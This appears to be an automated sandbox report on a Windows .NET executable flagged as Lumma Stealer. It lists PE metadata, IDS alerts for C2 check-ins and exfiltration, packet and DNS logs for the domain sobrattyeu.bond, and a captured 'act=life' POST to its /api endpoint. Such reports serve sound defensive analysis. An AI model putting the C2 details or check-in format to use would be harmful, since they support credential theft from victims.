                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0xC6FB477C [Tue Oct 15 09:16:44 2075 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                            Instruction
                            jmp dword ptr [00402000h]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x103500x4b.text
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x120000x598.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xc.reloc
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x103090x1c.text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000xe3a40xe400a477556f10e0f94ff07851ab21409ae9False0.520764802631579data6.042242922628573IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0x120000x5980x600123aca95e4555687b41c2cebfd368cb4False0.41015625data4.0349728002939855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            .reloc0x140000xc0x2008afa85677c54490f83975db63dd0f5e1False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                            .idata0x160000x4ce000x4ce009cbc06c4dc8eca9f425eb754efac65ffFalse1.0003366361788617data7.999394932403458IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_VERSION0x120a00x30cdata0.41923076923076924
                            RT_MANIFEST0x123ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                            DLLImport
                            mscoree.dll_CorExeMain
                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2025-01-15T18:11:05.442760+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149707104.21.64.1443TCP
                            2025-01-15T18:11:05.949857+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.1149707104.21.64.1443TCP
                            2025-01-15T18:11:05.949857+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149707104.21.64.1443TCP
                            2025-01-15T18:11:06.693913+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149708104.21.64.1443TCP
                            2025-01-15T18:11:07.501941+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.1149708104.21.64.1443TCP
                            2025-01-15T18:11:07.501941+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149708104.21.64.1443TCP
                            2025-01-15T18:11:08.156911+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149710104.21.64.1443TCP
                            2025-01-15T18:11:08.917043+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.1149710104.21.64.1443TCP
                            2025-01-15T18:11:09.451195+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149715104.21.64.1443TCP
                            2025-01-15T18:11:10.735748+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149727104.21.64.1443TCP
                            2025-01-15T18:11:12.853049+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149742104.21.64.1443TCP
                            2025-01-15T18:11:14.284231+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149750104.21.64.1443TCP
                            2025-01-15T18:11:16.693086+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.1149769104.21.64.1443TCP
                            2025-01-15T18:11:17.494241+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.1149769104.21.64.1443TCP
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 15, 2025 18:11:04.956841946 CET49707443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:04.956890106 CET44349707104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:04.957000971 CET49707443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:04.959758997 CET49707443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:04.959775925 CET44349707104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:05.442672014 CET44349707104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:05.442759991 CET49707443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:05.448326111 CET49707443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:05.448365927 CET44349707104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:05.448621988 CET44349707104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:05.491581917 CET49707443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:05.513354063 CET49707443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:05.513437986 CET49707443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:05.513514996 CET44349707104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:05.949846029 CET44349707104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:05.949924946 CET44349707104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:05.949990988 CET49707443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:05.969974041 CET49707443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:05.969995022 CET44349707104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:06.050548077 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:06.050573111 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:06.050643921 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:06.050951958 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:06.050961971 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:06.693810940 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:06.693912983 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:06.754641056 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:06.754666090 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:06.755105972 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:06.756645918 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:06.757102013 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:06.757122993 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.501921892 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.501983881 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.502034903 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.502052069 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.502093077 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.502119064 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.502135038 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.502141953 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.502178907 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.502494097 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.502840996 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.502881050 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.502911091 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.502916098 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.503006935 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.503014088 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.506563902 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.506640911 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.506647110 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.554088116 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.592329025 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.592398882 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.592453003 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.592461109 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.592515945 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.592562914 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.592828989 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.592842102 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.592864990 CET49708443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.592869997 CET44349708104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.692011118 CET49710443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.692049980 CET44349710104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:07.692136049 CET49710443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.692481995 CET49710443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:07.692493916 CET44349710104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:08.156826019 CET44349710104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:08.156910896 CET49710443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:08.158406019 CET49710443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:08.158410072 CET44349710104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:08.158734083 CET44349710104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:08.160480022 CET49710443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:08.160480022 CET49710443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:08.160542965 CET44349710104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:08.917066097 CET44349710104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:08.917196989 CET44349710104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:08.917257071 CET49710443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:08.940087080 CET49710443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:08.940107107 CET44349710104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:08.971963882 CET49715443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:08.972007990 CET44349715104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:08.972369909 CET49715443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:08.972486973 CET49715443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:08.972505093 CET44349715104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:09.451107025 CET44349715104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:09.451195002 CET49715443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:09.509351969 CET49715443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:09.509377956 CET44349715104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:09.509772062 CET44349715104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:09.557487965 CET49715443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:09.561263084 CET49715443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:09.561414003 CET49715443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:09.561454058 CET44349715104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:09.561702013 CET49715443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:09.561709881 CET44349715104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:10.130712986 CET44349715104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:10.130796909 CET44349715104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:10.130871058 CET49715443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:10.131344080 CET49715443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:10.131362915 CET44349715104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:10.271572113 CET49727443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:10.271605968 CET44349727104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:10.271863937 CET49727443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:10.272106886 CET49727443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:10.272119045 CET44349727104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:10.735682964 CET44349727104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:10.735748053 CET49727443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:10.737234116 CET49727443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:10.737238884 CET44349727104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:10.737490892 CET44349727104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:10.738748074 CET49727443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:10.739013910 CET49727443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:10.739052057 CET44349727104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:10.739125013 CET49727443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:10.739134073 CET44349727104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:11.972405910 CET44349727104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:11.972523928 CET44349727104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:11.977282047 CET49727443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:12.033809900 CET49727443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:12.033885002 CET44349727104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:12.362092972 CET49742443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:12.362133026 CET44349742104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:12.362201929 CET49742443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:12.362651110 CET49742443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:12.362662077 CET44349742104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:12.852915049 CET44349742104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:12.853049040 CET49742443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:12.865864992 CET49742443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:12.865906000 CET44349742104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:12.866163969 CET44349742104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:12.867679119 CET49742443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:12.867763996 CET49742443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:12.867773056 CET44349742104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:13.412492037 CET44349742104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:13.412627935 CET44349742104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:13.412899017 CET49742443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:13.412998915 CET49742443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:13.413022995 CET44349742104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:13.808569908 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:13.808614969 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:13.808705091 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:13.809075117 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:13.809092999 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.284128904 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.284230947 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.286001921 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.286015034 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.286365986 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.288238049 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.289294004 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.289350986 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.289465904 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.289501905 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.289598942 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.289680958 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.289797068 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.289834976 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.289967060 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.289999008 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.290122986 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.290154934 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.290169001 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.290293932 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.290332079 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.299617052 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.299808025 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.299849987 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.299856901 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.299880028 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.299895048 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.300035954 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.300091982 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.300121069 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.305604935 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:14.305704117 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:14.305721998 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:16.227771997 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:16.227890015 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:16.227965117 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:16.229231119 CET49750443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:16.229254961 CET44349750104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:16.233359098 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:16.233393908 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:16.233645916 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:16.234106064 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:16.234122992 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:16.692862034 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:16.693085909 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:16.695091009 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:16.695108891 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:16.695360899 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:16.696856976 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:16.696856976 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:16.696928024 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494245052 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494308949 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494343996 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494379997 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494379044 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:17.494411945 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494430065 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:17.494445086 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494483948 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494484901 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:17.494497061 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494534016 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:17.494540930 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494863033 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494895935 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494903088 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:17.494910002 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.494965076 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:17.494971037 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.495003939 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.495053053 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:17.495220900 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:17.495235920 CET44349769104.21.64.1192.168.2.11
                            Jan 15, 2025 18:11:17.495248079 CET49769443192.168.2.11104.21.64.1
                            Jan 15, 2025 18:11:17.495254040 CET44349769104.21.64.1192.168.2.11
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 15, 2025 18:11:04.932427883 CET6113453192.168.2.111.1.1.1
                            Jan 15, 2025 18:11:04.951430082 CET53611341.1.1.1192.168.2.11
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jan 15, 2025 18:11:04.932427883 CET192.168.2.111.1.1.10x7eb6Standard query (0)sobrattyeu.bondA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jan 15, 2025 18:11:04.951430082 CET1.1.1.1192.168.2.110x7eb6No error (0)sobrattyeu.bond104.21.64.1A (IP address)IN (0x0001)false
                            Jan 15, 2025 18:11:04.951430082 CET1.1.1.1192.168.2.110x7eb6No error (0)sobrattyeu.bond104.21.96.1A (IP address)IN (0x0001)false
                            Jan 15, 2025 18:11:04.951430082 CET1.1.1.1192.168.2.110x7eb6No error (0)sobrattyeu.bond104.21.48.1A (IP address)IN (0x0001)false
                            Jan 15, 2025 18:11:04.951430082 CET1.1.1.1192.168.2.110x7eb6No error (0)sobrattyeu.bond104.21.16.1A (IP address)IN (0x0001)false
                            Jan 15, 2025 18:11:04.951430082 CET1.1.1.1192.168.2.110x7eb6No error (0)sobrattyeu.bond104.21.112.1A (IP address)IN (0x0001)false
                            Jan 15, 2025 18:11:04.951430082 CET1.1.1.1192.168.2.110x7eb6No error (0)sobrattyeu.bond104.21.80.1A (IP address)IN (0x0001)false
                            Jan 15, 2025 18:11:04.951430082 CET1.1.1.1192.168.2.110x7eb6No error (0)sobrattyeu.bond104.21.32.1A (IP address)IN (0x0001)false
                            • sobrattyeu.bond
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.1149707104.21.64.14437732C:\Users\user\Desktop\EZsrFTi.exe
                            TimestampBytes transferredDirectionData
                            2025-01-15 17:11:05 UTC262OUTPOST /api HTTP/1.1
                            Connection: Keep-Alive
                            Content-Type: application/x-www-form-urlencoded
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                            Content-Length: 8
                            Host: sobrattyeu.bond
                            2025-01-15 17:11:05 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                            Data Ascii: act=life
                            2025-01-15 17:11:05 UTC1121INHTTP/1.1 200 OK
                            Date: Wed, 15 Jan 2025 17:11:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            Set-Cookie: PHPSESSID=pqslr3rk4uk83odiidgvnu3c9p; expires=Sun, 11 May 2025 10:57:44 GMT; Max-Age=9999999; path=/
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: no-store, no-cache, must-revalidate
                            Pragma: no-cache
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            cf-cache-status: DYNAMIC
                            vary: accept-encoding
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MS5pqPKws0B%2B8mUplQUwYhmxM5KFINhhunMUtf1JMMP8Z9kuwKmNyTex1vW9zApVhZIFBqMpcb%2FBHzW4xIKEjRZ3uX9lBnGuFI055SVFnDKbkhjhW0H9rhNZN8BYMKh46Oo%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 90277ba3ca774414-EWR
                            alt-svc: h3=":443"; ma=86400
